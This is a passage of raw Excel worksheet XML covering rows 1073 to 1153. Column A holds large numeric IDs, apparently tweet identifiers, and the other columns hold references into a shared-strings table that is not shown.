        <v>2838</v>
      </c>
    </row>
    <row r="1073" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1073">
        <v>1.2355526285970801E+18</v>
      </c>
      <c r="B1073" t="s">
        <v>2839</v>
      </c>
      <c r="C1073" t="s">
        <v>1</v>
      </c>
      <c r="D1073" t="s">
        <v>2840</v>
      </c>
      <c r="E1073" t="s">
        <v>2841</v>
      </c>
    </row>
    <row r="1074" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1074">
        <v>1.2355524659293701E+18</v>
      </c>
      <c r="B1074" t="s">
        <v>2842</v>
      </c>
      <c r="C1074" t="s">
        <v>1</v>
      </c>
      <c r="D1074" t="s">
        <v>2843</v>
      </c>
      <c r="E1074" t="s">
        <v>2844</v>
      </c>
    </row>
    <row r="1075" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1075">
        <v>1.23555240251582E+18</v>
      </c>
      <c r="B1075" t="s">
        <v>2845</v>
      </c>
      <c r="C1075" t="s">
        <v>1</v>
      </c>
      <c r="D1075" t="s">
        <v>2846</v>
      </c>
      <c r="E1075" t="s">
        <v>2847</v>
      </c>
    </row>
    <row r="1076" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1076">
        <v>1.23555230110178E+18</v>
      </c>
      <c r="B1076" t="s">
        <v>2848</v>
      </c>
      <c r="C1076" t="s">
        <v>1</v>
      </c>
      <c r="D1076" t="s">
        <v>2849</v>
      </c>
      <c r="E1076" t="s">
        <v>2850</v>
      </c>
    </row>
    <row r="1077" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1077">
        <v>1.23555197775454E+18</v>
      </c>
      <c r="B1077" t="s">
        <v>2851</v>
      </c>
      <c r="C1077" t="s">
        <v>1</v>
      </c>
      <c r="D1077" t="s">
        <v>2852</v>
      </c>
      <c r="E1077" t="s">
        <v>1774</v>
      </c>
    </row>
    <row r="1078" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1078">
        <v>1.23555193014061E+18</v>
      </c>
      <c r="B1078" t="s">
        <v>2853</v>
      </c>
      <c r="C1078" t="s">
        <v>1</v>
      </c>
      <c r="D1078" t="s">
        <v>2854</v>
      </c>
      <c r="E1078" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="1079" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1079">
        <v>1.23555176335841E+18</v>
      </c>
      <c r="B1079" t="s">
        <v>2855</v>
      </c>
      <c r="C1079" t="s">
        <v>1</v>
      </c>
      <c r="D1079" t="s">
        <v>2856</v>
      </c>
      <c r="E1079" t="s">
        <v>2857</v>
      </c>
    </row>
    <row r="1080" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1080">
        <v>1.2355517468161201E+18</v>
      </c>
      <c r="B1080" t="s">
        <v>2858</v>
      </c>
      <c r="C1080" t="s">
        <v>1</v>
      </c>
      <c r="D1080" t="s">
        <v>2859</v>
      </c>
      <c r="E1080" t="s">
        <v>2860</v>
      </c>
    </row>
    <row r="1081" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1081">
        <v>1.2355512842765E+18</v>
      </c>
      <c r="B1081" t="s">
        <v>2861</v>
      </c>
      <c r="C1081" t="s">
        <v>1</v>
      </c>
      <c r="D1081" t="s">
        <v>2862</v>
      </c>
      <c r="E1081" t="s">
        <v>2863</v>
      </c>
    </row>
    <row r="1082" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1082">
        <v>1.2355511077215099E+18</v>
      </c>
      <c r="B1082" t="s">
        <v>2864</v>
      </c>
      <c r="C1082" t="s">
        <v>1</v>
      </c>
      <c r="D1082" t="s">
        <v>2865</v>
      </c>
      <c r="E1082" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="1083" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1083">
        <v>1.23555101445297E+18</v>
      </c>
      <c r="B1083" t="s">
        <v>2866</v>
      </c>
      <c r="C1083" t="s">
        <v>1</v>
      </c>
      <c r="D1083" t="s">
        <v>2867</v>
      </c>
      <c r="E1083" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="1084" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1084">
        <v>1.2355510001962801E+18</v>
      </c>
      <c r="B1084" t="s">
        <v>2868</v>
      </c>
      <c r="C1084" t="s">
        <v>1</v>
      </c>
      <c r="D1084" t="s">
        <v>2869</v>
      </c>
      <c r="E1084" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="1085" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1085">
        <v>1.2355508347813801E+18</v>
      </c>
      <c r="B1085" t="s">
        <v>2870</v>
      </c>
      <c r="C1085" t="s">
        <v>1</v>
      </c>
      <c r="D1085" t="s">
        <v>2871</v>
      </c>
      <c r="E1085" t="s">
        <v>454</v>
      </c>
    </row>
    <row r="1086" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1086">
        <v>1.2355506662082601E+18</v>
      </c>
      <c r="B1086" t="s">
        <v>2872</v>
      </c>
      <c r="C1086" t="s">
        <v>1</v>
      </c>
      <c r="D1086" t="s">
        <v>2873</v>
      </c>
      <c r="E1086" t="s">
        <v>1208</v>
      </c>
    </row>
    <row r="1087" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1087">
        <v>1.23555064151203E+18</v>
      </c>
      <c r="B1087" t="s">
        <v>2874</v>
      </c>
      <c r="C1087" t="s">
        <v>1</v>
      </c>
      <c r="D1087" t="s">
        <v>2875</v>
      </c>
      <c r="E1087" t="s">
        <v>2498</v>
      </c>
    </row>
    <row r="1088" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1088">
        <v>1.23555063409662E+18</v>
      </c>
      <c r="B1088" t="s">
        <v>2876</v>
      </c>
      <c r="C1088" t="s">
        <v>1</v>
      </c>
      <c r="D1088" t="s">
        <v>2877</v>
      </c>
      <c r="E1088" t="s">
        <v>2878</v>
      </c>
    </row>
    <row r="1089" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1089">
        <v>1.23555060516415E+18</v>
      </c>
      <c r="B1089" t="s">
        <v>2879</v>
      </c>
      <c r="C1089" t="s">
        <v>1</v>
      </c>
      <c r="D1089" t="s">
        <v>2880</v>
      </c>
      <c r="E1089" t="s">
        <v>404</v>
      </c>
    </row>
    <row r="1090" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1090">
        <v>1.2355505817726799E+18</v>
      </c>
      <c r="B1090" t="s">
        <v>2881</v>
      </c>
      <c r="C1090" t="s">
        <v>1</v>
      </c>
      <c r="D1090" t="s">
        <v>2882</v>
      </c>
      <c r="E1090" t="s">
        <v>938</v>
      </c>
    </row>
    <row r="1091" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1091">
        <v>1.23555045129214E+18</v>
      </c>
      <c r="B1091" t="s">
        <v>2883</v>
      </c>
      <c r="C1091" t="s">
        <v>1</v>
      </c>
      <c r="D1091" t="s">
        <v>2884</v>
      </c>
      <c r="E1091" t="s">
        <v>1351</v>
      </c>
    </row>
    <row r="1092" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1092">
        <v>1.2355504462420201E+18</v>
      </c>
      <c r="B1092" t="s">
        <v>2885</v>
      </c>
      <c r="C1092" t="s">
        <v>1</v>
      </c>
      <c r="D1092" t="s">
        <v>2886</v>
      </c>
      <c r="E1092" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="1093" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1093">
        <v>1.2355503085557801E+18</v>
      </c>
      <c r="B1093" t="s">
        <v>2887</v>
      </c>
      <c r="C1093" t="s">
        <v>1</v>
      </c>
      <c r="D1093" t="s">
        <v>2888</v>
      </c>
      <c r="E1093" t="s">
        <v>2889</v>
      </c>
    </row>
    <row r="1094" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1094">
        <v>1.2355499537426601E+18</v>
      </c>
      <c r="B1094" t="s">
        <v>2890</v>
      </c>
      <c r="C1094" t="s">
        <v>1</v>
      </c>
      <c r="D1094" t="s">
        <v>2891</v>
      </c>
      <c r="E1094" t="s">
        <v>2892</v>
      </c>
    </row>
    <row r="1095" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1095">
        <v>1.2355499263791301E+18</v>
      </c>
      <c r="B1095" t="s">
        <v>2893</v>
      </c>
      <c r="C1095" t="s">
        <v>1</v>
      </c>
      <c r="D1095" t="s">
        <v>2894</v>
      </c>
      <c r="E1095" t="s">
        <v>2895</v>
      </c>
    </row>
    <row r="1096" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1096">
        <v>1.23554968750081E+18</v>
      </c>
      <c r="B1096" t="s">
        <v>2896</v>
      </c>
      <c r="C1096" t="s">
        <v>1</v>
      </c>
      <c r="D1096" t="s">
        <v>2897</v>
      </c>
      <c r="E1096" t="s">
        <v>2898</v>
      </c>
    </row>
    <row r="1097" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1097">
        <v>1.23554938655123E+18</v>
      </c>
      <c r="B1097" t="s">
        <v>2899</v>
      </c>
      <c r="C1097" t="s">
        <v>1</v>
      </c>
      <c r="D1097" t="s">
        <v>2900</v>
      </c>
      <c r="E1097" t="s">
        <v>2901</v>
      </c>
    </row>
    <row r="1098" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1098">
        <v>1.2355492186615099E+18</v>
      </c>
      <c r="B1098" t="s">
        <v>2902</v>
      </c>
      <c r="C1098" t="s">
        <v>1</v>
      </c>
      <c r="D1098" t="s">
        <v>2903</v>
      </c>
      <c r="E1098" t="s">
        <v>2904</v>
      </c>
    </row>
    <row r="1099" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1099">
        <v>1.23554870486786E+18</v>
      </c>
      <c r="B1099" t="s">
        <v>2905</v>
      </c>
      <c r="C1099" t="s">
        <v>1</v>
      </c>
      <c r="D1099" t="s">
        <v>2906</v>
      </c>
      <c r="E1099" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="1100" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1100">
        <v>1.2355478500686999E+18</v>
      </c>
      <c r="B1100" t="s">
        <v>2907</v>
      </c>
      <c r="C1100" t="s">
        <v>1</v>
      </c>
      <c r="D1100" t="s">
        <v>2908</v>
      </c>
      <c r="E1100" t="s">
        <v>2909</v>
      </c>
    </row>
    <row r="1101" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1101">
        <v>1.23554708768253E+18</v>
      </c>
      <c r="B1101" t="s">
        <v>2910</v>
      </c>
      <c r="C1101" t="s">
        <v>1</v>
      </c>
      <c r="D1101" t="s">
        <v>2911</v>
      </c>
      <c r="E1101" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="1102" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1102">
        <v>1.23554696828737E+18</v>
      </c>
      <c r="B1102" t="s">
        <v>2912</v>
      </c>
      <c r="C1102" t="s">
        <v>1</v>
      </c>
      <c r="D1102" t="s">
        <v>2913</v>
      </c>
      <c r="E1102" t="s">
        <v>2914</v>
      </c>
    </row>
    <row r="1103" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1103">
        <v>1.2355464629074401E+18</v>
      </c>
      <c r="B1103" t="s">
        <v>2915</v>
      </c>
      <c r="C1103" t="s">
        <v>1</v>
      </c>
      <c r="D1103" t="s">
        <v>2916</v>
      </c>
      <c r="E1103" t="s">
        <v>2909</v>
      </c>
    </row>
    <row r="1104" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1104">
        <v>1.2355463510284201E+18</v>
      </c>
      <c r="B1104" t="s">
        <v>2917</v>
      </c>
      <c r="C1104" t="s">
        <v>1</v>
      </c>
      <c r="D1104" t="s">
        <v>2918</v>
      </c>
      <c r="E1104" t="s">
        <v>2919</v>
      </c>
    </row>
    <row r="1105" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1105">
        <v>1.23554511322655E+18</v>
      </c>
      <c r="B1105" t="s">
        <v>2920</v>
      </c>
      <c r="C1105" t="s">
        <v>1</v>
      </c>
      <c r="D1105" t="s">
        <v>2921</v>
      </c>
      <c r="E1105" t="s">
        <v>2922</v>
      </c>
    </row>
    <row r="1106" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1106">
        <v>1.23554509506109E+18</v>
      </c>
      <c r="B1106" t="s">
        <v>2923</v>
      </c>
      <c r="C1106" t="s">
        <v>1</v>
      </c>
      <c r="D1106" t="s">
        <v>2924</v>
      </c>
      <c r="E1106" t="s">
        <v>2925</v>
      </c>
    </row>
    <row r="1107" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1107">
        <v>1.2355445705675E+18</v>
      </c>
      <c r="B1107" t="s">
        <v>2926</v>
      </c>
      <c r="C1107" t="s">
        <v>1</v>
      </c>
      <c r="D1107" t="s">
        <v>2927</v>
      </c>
      <c r="E1107" t="s">
        <v>2928</v>
      </c>
    </row>
    <row r="1108" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1108">
        <v>1.23554407424718E+18</v>
      </c>
      <c r="B1108" t="s">
        <v>2929</v>
      </c>
      <c r="C1108" t="s">
        <v>1</v>
      </c>
      <c r="D1108" t="s">
        <v>2930</v>
      </c>
      <c r="E1108" t="s">
        <v>2931</v>
      </c>
    </row>
    <row r="1109" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1109">
        <v>1.2355437591500301E+18</v>
      </c>
      <c r="B1109" t="s">
        <v>2932</v>
      </c>
      <c r="C1109" t="s">
        <v>1</v>
      </c>
      <c r="D1109" t="s">
        <v>2933</v>
      </c>
      <c r="E1109" t="s">
        <v>214</v>
      </c>
    </row>
    <row r="1110" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1110">
        <v>1.2355434257741199E+18</v>
      </c>
      <c r="B1110" t="s">
        <v>2934</v>
      </c>
      <c r="C1110" t="s">
        <v>1</v>
      </c>
      <c r="D1110" t="s">
        <v>2935</v>
      </c>
      <c r="E1110" t="s">
        <v>2936</v>
      </c>
    </row>
    <row r="1111" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1111">
        <v>1.2355431156011899E+18</v>
      </c>
      <c r="B1111" t="s">
        <v>2937</v>
      </c>
      <c r="C1111" t="s">
        <v>1</v>
      </c>
      <c r="D1111" t="s">
        <v>2938</v>
      </c>
      <c r="E1111" t="s">
        <v>2939</v>
      </c>
    </row>
    <row r="1112" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1112">
        <v>1.2355430805200799E+18</v>
      </c>
      <c r="B1112" t="s">
        <v>2940</v>
      </c>
      <c r="C1112" t="s">
        <v>1</v>
      </c>
      <c r="D1112" t="s">
        <v>2941</v>
      </c>
      <c r="E1112" t="s">
        <v>514</v>
      </c>
    </row>
    <row r="1113" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1113">
        <v>1.23554284454414E+18</v>
      </c>
      <c r="B1113" t="s">
        <v>2942</v>
      </c>
      <c r="C1113" t="s">
        <v>1</v>
      </c>
      <c r="D1113" t="s">
        <v>2943</v>
      </c>
      <c r="E1113" t="s">
        <v>2944</v>
      </c>
    </row>
    <row r="1114" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1114">
        <v>1.23554278706562E+18</v>
      </c>
      <c r="B1114" t="s">
        <v>2945</v>
      </c>
      <c r="C1114" t="s">
        <v>1</v>
      </c>
      <c r="D1114" t="s">
        <v>2946</v>
      </c>
      <c r="E1114" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="1115" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1115">
        <v>1.2355424999109499E+18</v>
      </c>
      <c r="B1115" t="s">
        <v>2947</v>
      </c>
      <c r="C1115" t="s">
        <v>1</v>
      </c>
      <c r="D1115" t="s">
        <v>2948</v>
      </c>
      <c r="E1115" t="s">
        <v>2949</v>
      </c>
    </row>
    <row r="1116" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1116">
        <v>1.2355423528165601E+18</v>
      </c>
      <c r="B1116" t="s">
        <v>2950</v>
      </c>
      <c r="C1116" t="s">
        <v>1</v>
      </c>
      <c r="D1116" t="s">
        <v>2951</v>
      </c>
      <c r="E1116" t="s">
        <v>2952</v>
      </c>
    </row>
    <row r="1117" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1117">
        <v>1.2355419264573199E+18</v>
      </c>
      <c r="B1117" t="s">
        <v>2953</v>
      </c>
      <c r="C1117" t="s">
        <v>1</v>
      </c>
      <c r="D1117" t="s">
        <v>2954</v>
      </c>
      <c r="E1117" t="s">
        <v>2838</v>
      </c>
    </row>
    <row r="1118" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1118">
        <v>1.2355418367283799E+18</v>
      </c>
      <c r="B1118" t="s">
        <v>2955</v>
      </c>
      <c r="C1118" t="s">
        <v>1</v>
      </c>
      <c r="D1118" t="s">
        <v>2956</v>
      </c>
      <c r="E1118" t="s">
        <v>1071</v>
      </c>
    </row>
    <row r="1119" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1119">
        <v>1.2355418352687501E+18</v>
      </c>
      <c r="B1119" t="s">
        <v>2955</v>
      </c>
      <c r="C1119" t="s">
        <v>1</v>
      </c>
      <c r="D1119" t="s">
        <v>2957</v>
      </c>
      <c r="E1119" t="s">
        <v>2958</v>
      </c>
    </row>
    <row r="1120" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1120">
        <v>1.23554181998483E+18</v>
      </c>
      <c r="B1120" t="s">
        <v>2959</v>
      </c>
      <c r="C1120" t="s">
        <v>1</v>
      </c>
      <c r="D1120" t="s">
        <v>2960</v>
      </c>
      <c r="E1120" t="s">
        <v>359</v>
      </c>
    </row>
    <row r="1121" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1121">
        <v>1.2355416779320399E+18</v>
      </c>
      <c r="B1121" t="s">
        <v>2961</v>
      </c>
      <c r="C1121" t="s">
        <v>1</v>
      </c>
      <c r="D1121" t="s">
        <v>2962</v>
      </c>
      <c r="E1121" t="s">
        <v>2963</v>
      </c>
    </row>
    <row r="1122" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1122">
        <v>1.2355415234895301E+18</v>
      </c>
      <c r="B1122" t="s">
        <v>2964</v>
      </c>
      <c r="C1122" t="s">
        <v>1</v>
      </c>
      <c r="D1122" t="s">
        <v>2965</v>
      </c>
      <c r="E1122" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="1123" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1123">
        <v>1.23554132685201E+18</v>
      </c>
      <c r="B1123" t="s">
        <v>2966</v>
      </c>
      <c r="C1123" t="s">
        <v>1</v>
      </c>
      <c r="D1123" t="s">
        <v>2967</v>
      </c>
      <c r="E1123" t="s">
        <v>2968</v>
      </c>
    </row>
    <row r="1124" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1124">
        <v>1.23554131853056E+18</v>
      </c>
      <c r="B1124" t="s">
        <v>2969</v>
      </c>
      <c r="C1124" t="s">
        <v>1</v>
      </c>
      <c r="D1124" t="s">
        <v>2970</v>
      </c>
      <c r="E1124" t="s">
        <v>236</v>
      </c>
    </row>
    <row r="1125" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1125">
        <v>1.23554114718083E+18</v>
      </c>
      <c r="B1125" t="s">
        <v>2971</v>
      </c>
      <c r="C1125" t="s">
        <v>1</v>
      </c>
      <c r="D1125" t="s">
        <v>2972</v>
      </c>
      <c r="E1125" t="s">
        <v>2973</v>
      </c>
    </row>
    <row r="1126" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1126">
        <v>1.23554111699856E+18</v>
      </c>
      <c r="B1126" t="s">
        <v>2974</v>
      </c>
      <c r="C1126" t="s">
        <v>1</v>
      </c>
      <c r="D1126" t="s">
        <v>2975</v>
      </c>
      <c r="E1126" t="s">
        <v>2838</v>
      </c>
    </row>
    <row r="1127" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1127">
        <v>1.2355397993285901E+18</v>
      </c>
      <c r="B1127" t="s">
        <v>2976</v>
      </c>
      <c r="C1127" t="s">
        <v>1</v>
      </c>
      <c r="D1127" t="s">
        <v>2977</v>
      </c>
      <c r="E1127" t="s">
        <v>2978</v>
      </c>
    </row>
    <row r="1128" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1128">
        <v>1.23553960483872E+18</v>
      </c>
      <c r="B1128" t="s">
        <v>2979</v>
      </c>
      <c r="C1128" t="s">
        <v>1</v>
      </c>
      <c r="D1128" t="s">
        <v>2980</v>
      </c>
      <c r="E1128" t="s">
        <v>2981</v>
      </c>
    </row>
    <row r="1129" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1129">
        <v>1.2355394273356101E+18</v>
      </c>
      <c r="B1129" t="s">
        <v>2982</v>
      </c>
      <c r="C1129" t="s">
        <v>1</v>
      </c>
      <c r="D1129" t="s">
        <v>2983</v>
      </c>
      <c r="E1129" t="s">
        <v>2838</v>
      </c>
    </row>
    <row r="1130" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1130">
        <v>1.23553939313118E+18</v>
      </c>
      <c r="B1130" t="s">
        <v>2984</v>
      </c>
      <c r="C1130" t="s">
        <v>1</v>
      </c>
      <c r="D1130" t="s">
        <v>2985</v>
      </c>
      <c r="E1130" t="s">
        <v>2986</v>
      </c>
    </row>
    <row r="1131" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1131">
        <v>1.23553933242689E+18</v>
      </c>
      <c r="B1131" t="s">
        <v>2987</v>
      </c>
      <c r="C1131" t="s">
        <v>1</v>
      </c>
      <c r="D1131" t="s">
        <v>2988</v>
      </c>
      <c r="E1131" t="s">
        <v>2989</v>
      </c>
    </row>
    <row r="1132" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1132">
        <v>1.2355391565597399E+18</v>
      </c>
      <c r="B1132" t="s">
        <v>2990</v>
      </c>
      <c r="C1132" t="s">
        <v>1</v>
      </c>
      <c r="D1132" t="s">
        <v>2991</v>
      </c>
      <c r="E1132" t="s">
        <v>2992</v>
      </c>
    </row>
    <row r="1133" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1133">
        <v>1.23553874219187E+18</v>
      </c>
      <c r="B1133" t="s">
        <v>2993</v>
      </c>
      <c r="C1133" t="s">
        <v>1</v>
      </c>
      <c r="D1133" t="s">
        <v>2994</v>
      </c>
      <c r="E1133" t="s">
        <v>2995</v>
      </c>
    </row>
    <row r="1134" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1134">
        <v>1.2355385870992901E+18</v>
      </c>
      <c r="B1134" t="s">
        <v>2996</v>
      </c>
      <c r="C1134" t="s">
        <v>1</v>
      </c>
      <c r="D1134" t="s">
        <v>2997</v>
      </c>
      <c r="E1134" t="s">
        <v>2998</v>
      </c>
    </row>
    <row r="1135" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1135">
        <v>1.23553821116802E+18</v>
      </c>
      <c r="B1135" t="s">
        <v>2999</v>
      </c>
      <c r="C1135" t="s">
        <v>1</v>
      </c>
      <c r="D1135" t="s">
        <v>3000</v>
      </c>
      <c r="E1135" t="s">
        <v>3001</v>
      </c>
    </row>
    <row r="1136" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1136">
        <v>1.2355380659695099E+18</v>
      </c>
      <c r="B1136" t="s">
        <v>3002</v>
      </c>
      <c r="C1136" t="s">
        <v>1</v>
      </c>
      <c r="D1136" t="s">
        <v>3003</v>
      </c>
      <c r="E1136" t="s">
        <v>3004</v>
      </c>
    </row>
    <row r="1137" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1137">
        <v>1.2355377895438001E+18</v>
      </c>
      <c r="B1137" t="s">
        <v>3005</v>
      </c>
      <c r="C1137" t="s">
        <v>1</v>
      </c>
      <c r="D1137" t="s">
        <v>3006</v>
      </c>
      <c r="E1137" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1138" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1138">
        <v>1.23553732252912E+18</v>
      </c>
      <c r="B1138" t="s">
        <v>3007</v>
      </c>
      <c r="C1138" t="s">
        <v>1</v>
      </c>
      <c r="D1138" t="s">
        <v>3008</v>
      </c>
      <c r="E1138" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1139" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1139">
        <v>1.23553731385104E+18</v>
      </c>
      <c r="B1139" t="s">
        <v>3009</v>
      </c>
      <c r="C1139" t="s">
        <v>1</v>
      </c>
      <c r="D1139" t="s">
        <v>3010</v>
      </c>
      <c r="E1139" t="s">
        <v>891</v>
      </c>
    </row>
    <row r="1140" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1140">
        <v>1.2355369516562199E+18</v>
      </c>
      <c r="B1140" t="s">
        <v>3011</v>
      </c>
      <c r="C1140" t="s">
        <v>1</v>
      </c>
      <c r="D1140" t="s">
        <v>3012</v>
      </c>
      <c r="E1140" t="s">
        <v>3013</v>
      </c>
    </row>
    <row r="1141" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1141">
        <v>1.2355367514453701E+18</v>
      </c>
      <c r="B1141" t="s">
        <v>3014</v>
      </c>
      <c r="C1141" t="s">
        <v>1</v>
      </c>
      <c r="D1141" t="s">
        <v>3015</v>
      </c>
      <c r="E1141" t="s">
        <v>3016</v>
      </c>
    </row>
    <row r="1142" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1142">
        <v>1.23553607654831E+18</v>
      </c>
      <c r="B1142" t="s">
        <v>3017</v>
      </c>
      <c r="C1142" t="s">
        <v>1</v>
      </c>
      <c r="D1142" t="s">
        <v>3018</v>
      </c>
      <c r="E1142" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="1143" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1143">
        <v>1.23553599239361E+18</v>
      </c>
      <c r="B1143" t="s">
        <v>3019</v>
      </c>
      <c r="C1143" t="s">
        <v>1</v>
      </c>
      <c r="D1143" t="s">
        <v>3020</v>
      </c>
      <c r="E1143" t="s">
        <v>3021</v>
      </c>
    </row>
    <row r="1144" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1144">
        <v>1.2355358001560399E+18</v>
      </c>
      <c r="B1144" t="s">
        <v>3022</v>
      </c>
      <c r="C1144" t="s">
        <v>1</v>
      </c>
      <c r="D1144" t="s">
        <v>3023</v>
      </c>
      <c r="E1144" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="1145" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1145">
        <v>1.2355357686150799E+18</v>
      </c>
      <c r="B1145" t="s">
        <v>3024</v>
      </c>
      <c r="C1145" t="s">
        <v>1</v>
      </c>
      <c r="D1145" t="s">
        <v>3025</v>
      </c>
      <c r="E1145" t="s">
        <v>3026</v>
      </c>
    </row>
    <row r="1146" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1146">
        <v>1.2355357240797599E+18</v>
      </c>
      <c r="B1146" t="s">
        <v>3027</v>
      </c>
      <c r="C1146" t="s">
        <v>1</v>
      </c>
      <c r="D1146" t="s">
        <v>3028</v>
      </c>
      <c r="E1146" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="1147" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1147">
        <v>1.2355356867254799E+18</v>
      </c>
      <c r="B1147" t="s">
        <v>3029</v>
      </c>
      <c r="C1147" t="s">
        <v>1</v>
      </c>
      <c r="D1147" t="s">
        <v>3030</v>
      </c>
      <c r="E1147" t="s">
        <v>356</v>
      </c>
    </row>
    <row r="1148" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1148">
        <v>1.23553558149442E+18</v>
      </c>
      <c r="B1148" t="s">
        <v>3031</v>
      </c>
      <c r="C1148" t="s">
        <v>1</v>
      </c>
      <c r="D1148" t="s">
        <v>3032</v>
      </c>
      <c r="E1148" t="s">
        <v>3033</v>
      </c>
    </row>
    <row r="1149" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1149">
        <v>1.2355355809283599E+18</v>
      </c>
      <c r="B1149" t="s">
        <v>3031</v>
      </c>
      <c r="C1149" t="s">
        <v>1</v>
      </c>
      <c r="D1149" t="s">
        <v>3034</v>
      </c>
      <c r="E1149" t="s">
        <v>3035</v>
      </c>
    </row>
    <row r="1150" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1150">
        <v>1.23553555161837E+18</v>
      </c>
      <c r="B1150" t="s">
        <v>3036</v>
      </c>
      <c r="C1150" t="s">
        <v>1</v>
      </c>
      <c r="D1150" t="s">
        <v>3037</v>
      </c>
      <c r="E1150" t="s">
        <v>3038</v>
      </c>
    </row>
    <row r="1151" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1151">
        <v>1.2355352821135099E+18</v>
      </c>
      <c r="B1151" t="s">
        <v>3039</v>
      </c>
      <c r="C1151" t="s">
        <v>1</v>
      </c>
      <c r="D1151" t="s">
        <v>3040</v>
      </c>
      <c r="E1151" t="s">
        <v>3041</v>
      </c>
    </row>
    <row r="1152" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1152">
        <v>1.2355351051810401E+18</v>
      </c>
      <c r="B1152" t="s">
        <v>3042</v>
      </c>
      <c r="C1152" t="s">
        <v>1</v>
      </c>
      <c r="D1152" t="s">
        <v>3043</v>
      </c>
      <c r="E1152" t="s">
        <v>3044</v>
      </c>
    </row>
    <row r="1153" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1153">
        <v>1.2355348563749601E+18</v>
      </c>
      <c r="B1153" t="s">
        <v>3045</v>
      </c>
      <c r="C1153" t="s">
        <v>1</v>
      </c>
      <c r="D1153" t="s">
        <v>3046</v>
      </c>
      <c r="E1153" t="s">
        <v>3047</v>
      </c>
    </row>
    <row r="1154" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A1154">
